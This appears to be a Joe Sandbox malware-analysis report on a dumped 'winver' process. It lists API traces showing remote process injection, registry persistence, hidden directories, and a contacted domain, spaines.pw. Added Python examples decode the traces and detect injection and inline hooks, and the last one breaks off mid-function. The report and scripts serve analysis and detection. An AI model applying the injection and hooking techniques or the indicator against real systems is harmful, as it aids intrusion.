                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                          • String ID: spaines.pw
                                                                                                                                                                          • API String ID: 4125869991-3306378189
                                                                                                                                                                          • Opcode ID: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                          • Instruction ID: 6ec13d41a18d60d1b1a4b07974bb7c083d775ee62450ef6281aef36bb46b4467
                                                                                                                                                                          • Opcode Fuzzy Hash: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                          • Instruction Fuzzy Hash: C431B771100200AEEB129F25C888BBA77EDEF48704F0587D5ED45EF256EB30E544CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 047E086E: RegCreateKeyExA.KERNELBASE(00000000,047E0840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0876
                                                                                                                                                                            • Part of subcall function 047E086E: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 047E089D
                                                                                                                                                                            • Part of subcall function 047E086E: RegCloseKey.KERNELBASE(?), ref: 047E08A9
                                                                                                                                                                          • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0900
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$CloseThreadValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 711899537-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 159276b3e8571cdca3a7d2fc699c11c8a8dac7ef8ef5e1f8e6cf536af12488bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 2B31F7720002547FFB017F719D8AABA3BACEF05304F400365BD85DA2A5EAB46965CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph (rendered image not reproduced): basic blocks 047E0B65-047E0C5C. FindWindowA at 047E0B65 leads either to 047E0BAC or to GetWindowThreadProcessId and OpenProcess at 047E0B74; from there the call to 047E0DE0 at 047E0B8E (VirtualAllocEx/WriteProcessMemory) is followed on one branch by ExitProcess at 047E0BA4, the other branches rejoining at 047E0BAC.
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowA.USER32(047E0B57,0000000E), ref: 047E0B6A
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 047E0B77
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 047E0B84
                                                                                                                                                                            • Part of subcall function 047E0DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,047E0D88,00000000,0000090B,00000000), ref: 047E0E06
                                                                                                                                                                            • Part of subcall function 047E0DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 047E0E24
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 047E0BA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3233011861-0
                                                                                                                                                                          • Opcode ID: a2e69455e6c0235321cdb51dd2fbe0695d8de5085b34702a57dba59bfeb00964
                                                                                                                                                                          • Instruction ID: 404769c6805cd95bb3c50b6254a1d70dc562386942e28c573192a9aee262a053
                                                                                                                                                                          • Opcode Fuzzy Hash: a2e69455e6c0235321cdb51dd2fbe0695d8de5085b34702a57dba59bfeb00964
                                                                                                                                                                          • Instruction Fuzzy Hash: DB1127312053916EFF113B738D58EB63F296F0A704F094295E844EE2B3DAA0E406D738
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
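Added example, not part of the Joe Sandbox report or of the sample's own code: a small Python parser for "APIs" lines in the layout used above, run over a constructed copy of the calls listed for the FindWindowA function. It decodes the OpenProcess access mask and the VirtualAllocEx allocation and protection flags and reports the OpenProcess, VirtualAllocEx (executable page), WriteProcessMemory sequence that marks a write into another process. One caveat the report itself shows: the argument columns are a stack snapshot rather than a prototype-exact decode (OpenProcess prints two values, Sleep fifteen, and `?` marks a value that was not captured), so the parser keeps only the leading positions for the APIs it decodes. The parameter counts and flag tables are the documented Win32 values; everything else (names, sample text) is assumed for the example.

```python
"""Parse Joe Sandbox-style 'APIs' lines and flag a remote-write chain.

Added example; it is not code from the report or from the sample.
"""
import re

# Constructed copy of the call lines shown for the FindWindowA function
# above; the parser accepts any line in the "• Api.Module(args), ref: addr"
# layout, with or without the "Part of subcall function" prefix.
SAMPLE_LINES = """\
• FindWindowA.USER32(047E0B57,0000000E), ref: 047E0B6A
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 047E0B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 047E0B84
  • Part of subcall function 047E0DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,047E0D88,00000000,0000090B,00000000), ref: 047E0E06
  • Part of subcall function 047E0DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 047E0E24
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 047E0BA6
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Declared parameter counts: the listing is a stack snapshot that is often
# longer or shorter than the prototype, so positions past these are dropped.
PARAM_COUNT = {"OpenProcess": 3, "VirtualAllocEx": 5, "WriteProcessMemory": 5}

PROCESS_ALL_ACCESS = 0x1F0FFF
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


def parse_arg(tok):
    """Hex stack slot -> int; '?' (value not captured) or empty -> None."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return -int(tok[1:], 16) if tok.startswith("-") else int(tok, 16)


def parse_api_lines(text):
    """Return the calls in listing order as dicts with decoded arguments."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an API line (headings, blank lines, ...)
        args = [parse_arg(t) for t in m["args"].split(",")]
        n = PARAM_COUNT.get(m["api"])
        calls.append({
            "api": m["api"], "module": m["module"], "ref": int(m["ref"], 16),
            "subcall": m["sub"], "args": args[:n] if n else args,
        })
    return calls


def decode_flags(value, table):
    """Render a bit mask with the names from `table` (hex if none match)."""
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def find_remote_write_chain(calls):
    """Match OpenProcess -> VirtualAllocEx(executable) -> WriteProcessMemory.

    Returns the findings as strings in call order; an empty list means the
    full chain was not seen.
    """
    findings, stage = [], 0
    for c in calls:
        if stage == 0 and c["api"] == "OpenProcess":
            access = c["args"][0]
            if access is not None and (access & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
                findings.append(f"OpenProcess at {c['ref']:08X} requests PROCESS_ALL_ACCESS")
                stage = 1
        elif stage == 1 and c["api"] == "VirtualAllocEx":
            size, alloc, prot = c["args"][2], c["args"][3], c["args"][4]
            if prot is not None and prot & 0xF0:  # any PAGE_EXECUTE_* value
                findings.append(
                    f"VirtualAllocEx at {c['ref']:08X}: {size:#x} bytes, "
                    f"{decode_flags(alloc or 0, MEM_FLAGS)}, {decode_flags(prot, PAGE_PROTECT)}")
                stage = 2
        elif stage == 2 and c["api"] == "WriteProcessMemory":
            findings.append(f"WriteProcessMemory at {c['ref']:08X} writes {c['args'][3]:#x} bytes")
            stage = 3
    return findings if stage == 3 else []


if __name__ == "__main__":
    for finding in find_remote_write_chain(parse_api_lines(SAMPLE_LINES)):
        print(finding)
```

On the sample the parser recovers the 0x4F37-byte allocation with MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE, and the matching 0x4F37-byte WriteProcessMemory; truncating the list before VirtualAllocEx yields no finding, which is the behaviour a triage script should have when only the handle open is present.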

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 047E269E
                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 047E26B7
                                                                                                                                                                          • ReadFile.KERNELBASE(047E298A,?,00000000,?,00000000), ref: 047E26DB
                                                                                                                                                                          • CloseHandle.KERNEL32(047E298A), ref: 047E26EC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3919263394-0
                                                                                                                                                                          • Opcode ID: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
                                                                                                                                                                          • Instruction ID: 067e3c4d48927ae61c44364f0045c85a78a8afbdb0e86f01964c5568bf3b796a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
                                                                                                                                                                          • Instruction Fuzzy Hash: C601EC30641209FFEF219F61CC45B6D7AB8FF04B44F2042A9AA14FD1E1D771AB609B54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 047E2715
                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 047E2732
                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 047E274E
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 047E275F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3604237281-0
                                                                                                                                                                          • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
                                                                                                                                                                          • Instruction ID: 730c678bac26591c9cafaf265b92f6ee85b153ac0a97720c16897de759642bda
                                                                                                                                                                          • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
                                                                                                                                                                          • Instruction Fuzzy Hash: 4601F630640209BFEF219FA1CC45F9D7EB8BF04B04F1042A8BB14BD1E1D770AA61AB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 047E1372
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 047E1387
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 047E13E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 74cfef6a2a17147eb9311fde9b5962fb23ee4f452774474350f0c3e983a1da1e
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: E5218E31904216AFDB119E79C849B6DBBB5AF08700F458325F955FB694D770A810CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
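The VirtualProtect(?, 0x20, 0x40) / VirtualAlloc(0, 0x20, 0x3000, 0x40) / VirtualProtect(?, 0x20, ?, ?) sequence above has the shape of an inline-hook installer: 0x20 bytes of an existing function are made PAGE_EXECUTE_READWRITE, a 0x20-byte RWX trampoline is allocated (MEM_COMMIT|MEM_RESERVE), and the original protection is put back. The Python below is an added example, not part of the Joe Sandbox output, showing how a memory-forensics check recognises such a patch: it assembles the 5-byte relative jmp a hook writes over a prologue, builds the trampoline that fits the 0x20-byte allocation, and resolves the jump target from dumped prologue bytes. The function address, module range, trampoline address and prologue bytes are constructed for illustration and are not values from this dump.

```python
import struct

# Constructed sample data (hypothetical addresses and bytes, not taken from the dump):
FUNC_ADDR = 0x77E5A120                              # address of a hooked user-mode export
CLEAN_PROLOG = bytes.fromhex("8bff558bec83ec10")    # mov edi,edi; push ebp; mov ebp,esp; sub esp,10h
TRAMPOLINE_ADDR = 0x047E1400                        # what VirtualAlloc(0, 0x20, MEM_COMMIT|MEM_RESERVE, RWX) might return
MODULE_RANGES = [(0x77E50000, 0x77F00000)]          # image range of the DLL that owns FUNC_ADDR
STOLEN = 5                                          # bytes overwritten by an E9 rel32 jmp


def make_jmp_rel32(src, dst):
    """5-byte 'jmp rel32' placed at src that lands on dst; rel32 is relative to the end of the instruction."""
    rel = (dst - (src + 5)) & 0xFFFFFFFF
    return b"\xe9" + struct.pack("<I", rel)


def build_trampoline(trampoline_addr, func_addr, clean_prolog, stolen=STOLEN):
    """Trampoline body: the stolen original bytes, then a jmp back to the first intact instruction.

    Only valid when the stolen bytes contain no relative operands (true for the mov/push/mov/sub prologue used here).
    """
    body = clean_prolog[:stolen]
    body += make_jmp_rel32(trampoline_addr + len(body), func_addr + stolen)
    assert len(body) <= 0x20, "trampoline does not fit the 0x20-byte allocation"
    return body


def resolve_hook(addr, live_bytes):
    """Target address if the bytes at addr start with a recognised inline-hook stub, else None."""
    if len(live_bytes) >= 5 and live_bytes[0] == 0xE9:                            # jmp rel32
        rel, = struct.unpack("<i", live_bytes[1:5])
        return (addr + 5 + rel) & 0xFFFFFFFF
    if len(live_bytes) >= 6 and live_bytes[0] == 0x68 and live_bytes[5] == 0xC3:  # push imm32; ret
        return struct.unpack("<I", live_bytes[1:5])[0]
    return None


def classify(addr, clean_prolog, live_bytes, module_ranges):
    """'clean', 'patched' (bytes differ, no known stub) or 'hooked -> 0x... (inside/outside module images)'."""
    target = resolve_hook(addr, live_bytes)
    if target is None:
        same = clean_prolog[:len(live_bytes)] == live_bytes[:len(clean_prolog)]
        return "clean" if same else "patched (no recognised stub)"
    inside = any(lo <= target < hi for lo, hi in module_ranges)
    where = "inside a module image" if inside else "outside every module image"
    return f"hooked -> {target:#010x} ({where})"


def demo():
    """Write the hook over a copy of the prologue and classify the result."""
    hooked = make_jmp_rel32(FUNC_ADDR, TRAMPOLINE_ADDR) + CLEAN_PROLOG[STOLEN:]
    return classify(FUNC_ADDR, CLEAN_PROLOG, hooked, MODULE_RANGES)


if __name__ == "__main__":
    print(demo())
    print(build_trampoline(TRAMPOLINE_ADDR, FUNC_ADDR, CLEAN_PROLOG).hex())
```

A jump target that falls outside every loaded module image (here, into a private RWX allocation like the 0x047E0000 region this dump was taken from) is the usual tell; a hook that lands inside another legitimate DLL needs the on-disk prologue comparison as well.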

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 047E0B77
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 047E0B84
                                                                                                                                                                            • Part of subcall function 047E0DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,047E0D88,00000000,0000090B,00000000), ref: 047E0E06
                                                                                                                                                                            • Part of subcall function 047E0DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 047E0E24
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 047E0BA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AllocExitMemoryOpenThreadVirtualWindowWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2938372061-0
                                                                                                                                                                          • Opcode ID: 92d44549b5709f63f8730254d569b315e67aba0022f272fcda3c2cab48766fcc
                                                                                                                                                                          • Instruction ID: 0c72b72681441a1bdf1250ab7aa10871dcb8b72fc15a7ce7387093499471faa3
                                                                                                                                                                          • Opcode Fuzzy Hash: 92d44549b5709f63f8730254d569b315e67aba0022f272fcda3c2cab48766fcc
                                                                                                                                                                          • Instruction Fuzzy Hash: 10E086746802912AFB113EA28C89FAA3E286F08755F080254FD85FE1D7CAA0D1564634
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyExA.KERNELBASE(00000000,047E0840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0876
                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 047E089D
                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 047E08A9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1818849710-0
                                                                                                                                                                          • Opcode ID: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
                                                                                                                                                                          • Instruction ID: d656670daf6e248caf9dbe5abbf866db88216dc43784e085ca31991b0d50db33
                                                                                                                                                                          • Opcode Fuzzy Hash: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
                                                                                                                                                                          • Instruction Fuzzy Hash: EBE09272100008BFEF126F60DC89A997B75EF54709F1480A1FE4AAD075CBB19AA0DF68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 047E0643: CreateMutexA.KERNELBASE(00000000,00000000), ref: 047E065A
                                                                                                                                                                            • Part of subcall function 047E0643: LoadLibraryA.KERNELBASE(047E0673,00000009,?,00000000), ref: 047E0681
                                                                                                                                                                            • Part of subcall function 047E0643: lstrcmpiA.KERNEL32(?,00000000), ref: 047E06EB
                                                                                                                                                                            • Part of subcall function 047E0643: Sleep.KERNELBASE(00001388), ref: 047E06FE
                                                                                                                                                                            • Part of subcall function 047E0643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E071F
                                                                                                                                                                            • Part of subcall function 047E0643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0731
                                                                                                                                                                            • Part of subcall function 047E0643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0752
                                                                                                                                                                            • Part of subcall function 047E0643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0764
                                                                                                                                                                            • Part of subcall function 047E0643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0785
                                                                                                                                                                          • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0900
                                                                                                                                                                            • Part of subcall function 047E0CE8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E0D07
                                                                                                                                                                            • Part of subcall function 047E0CE8: Sleep.KERNELBASE(000003E8), ref: 047E0D1D
                                                                                                                                                                            • Part of subcall function 047E0CE8: Process32First.KERNEL32(?,00000000), ref: 047E0D3D
                                                                                                                                                                            • Part of subcall function 047E0CE8: FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 047E0D88
                                                                                                                                                                            • Part of subcall function 047E0CE8: Process32Next.KERNEL32(?,?), ref: 047E0D9E
                                                                                                                                                                            • Part of subcall function 047E0CE8: FindCloseChangeNotification.KERNELBASE(?), ref: 047E0DCA
                                                                                                                                                                            • Part of subcall function 047E0CE8: Sleep.KERNELBASE(000003E8), ref: 047E0DD5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$DirectorySleep$AttributesChangeCloseFileFindNotificationProcess32$FirstLibraryLoadMutexNextSnapshotThreadToolhelp32lstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4243289212-0
                                                                                                                                                                          • Opcode ID: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                          • Instruction ID: 6777e6789e759070a149c9781162f979fbd846cb782b1f6ec02d3d30eba4e02f
                                                                                                                                                                          • Opcode Fuzzy Hash: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AD05EA10141B07DFB007FB28C8CD7B318CEE082083404735BE85D9265DDB469448976
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,047E2DA0,0000002F,?,00000000,00000001,F0000000), ref: 047E2DE0
                                                                                                                                                                          • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 047E2E06
                                                                                                                                                                          • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 047E2E29
                                                                                                                                                                          • CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 047E2E43
                                                                                                                                                                          • CryptVerifySignatureA.ADVAPI32(?,047E2A30,047E2A2C,?,00000000,00000000), ref: 047E2E63
                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 047E2E71
                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 047E2E7D
                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 047E2E8B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportInfoPublicReleaseSignatureVerify
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 295346115-0
                                                                                                                                                                          • Opcode ID: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
                                                                                                                                                                          • Instruction ID: a3aead413fb57d80102c6c83b18f3c82fb380e847d28e842346fea41c5d3cb2e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
                                                                                                                                                                          • Instruction Fuzzy Hash: 10111C31600124BBEF221F20CC89BE97B79AF54704F1441D5BE8ABD0A5DBB199A0DF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
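The listings above are machine-generated call sequences with raw stack values, so a triage pass has to decode the flag arguments and look for known behaviour chains. The Python below is an added example, not Joe Sandbox code: it parses call lines in this report's format, decodes the constants that matter for these functions (OpenProcess access mask, VirtualAlloc/VirtualAllocEx allocation type and page protection, RegSetValueExA value type, CryptCreateHash algorithm id, CreateToolhelp32Snapshot flags, Sleep duration) and flags the OpenProcess -> VirtualAllocEx(RWX) -> WriteProcessMemory chain at 047E0B84..047E0E24 and the RegCreateKeyExA -> RegSetValueExA chain at 047E0876..047E089D. The sample input is copied from those listings. Argument positions follow the documented Win32 prototypes; the plugin prints raw stack slots, so values beyond the documented parameter count are stack residue and are ignored.

```python
import re

# Constructed input: call lines copied from the listings in this report (bullets and indentation as printed).
SAMPLE = """\
• VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 047E1387
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 047E0B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 047E0B84
  • Part of subcall function 047E0DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,047E0D88,00000000,0000090B,00000000), ref: 047E0E06
  • Part of subcall function 047E0DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 047E0E24
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 047E0BA6
• RegCreateKeyExA.KERNELBASE(00000000,047E0840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0876
• RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 047E089D
  • Part of subcall function 047E0CE8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E0D07
  • Part of subcall function 047E0643: Sleep.KERNELBASE(00001388), ref: 047E06FE
• CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 047E2E29
"""

LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)")

PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
ALLOC = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
REG_TYPE = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD"}
CALG = {0x8003: "CALG_MD5", 0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256"}


def parse_arg(tok):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)   # '?' = not recovered by the plugin; '-000008D9' parses as negative


def parse_listing(text):
    """One dict per call line: api, module, ref address, enclosing subcall (or None), raw argument values."""
    return [{"api": m["api"], "module": m["mod"], "ref": int(m["ref"], 16),
             "sub": int(m["sub"], 16) if m["sub"] else None,
             "args": [parse_arg(t) for t in m["args"].split(",")]}
            for m in LINE_RE.finditer(text)]


def decode(call):
    """Meaning of the flag-bearing arguments, by documented parameter position (trailing slots are stack residue)."""
    api, a = call["api"], call["args"]
    out = {}
    if api == "OpenProcess" and a[0] is not None:
        # 0x1F0FFF is PROCESS_ALL_ACCESS as defined before Vista; SDKs from Vista on define it as 0x1FFFFF
        out["access"] = "PROCESS_ALL_ACCESS" if a[0] in (0x1F0FFF, 0x1FFFFF) else hex(a[0])
    elif api in ("VirtualAlloc", "VirtualAllocEx"):
        b = 1 if api == "VirtualAllocEx" else 0      # VirtualAllocEx takes hProcess first
        size, alloc_type, protect = a[b + 1], a[b + 2], a[b + 3]
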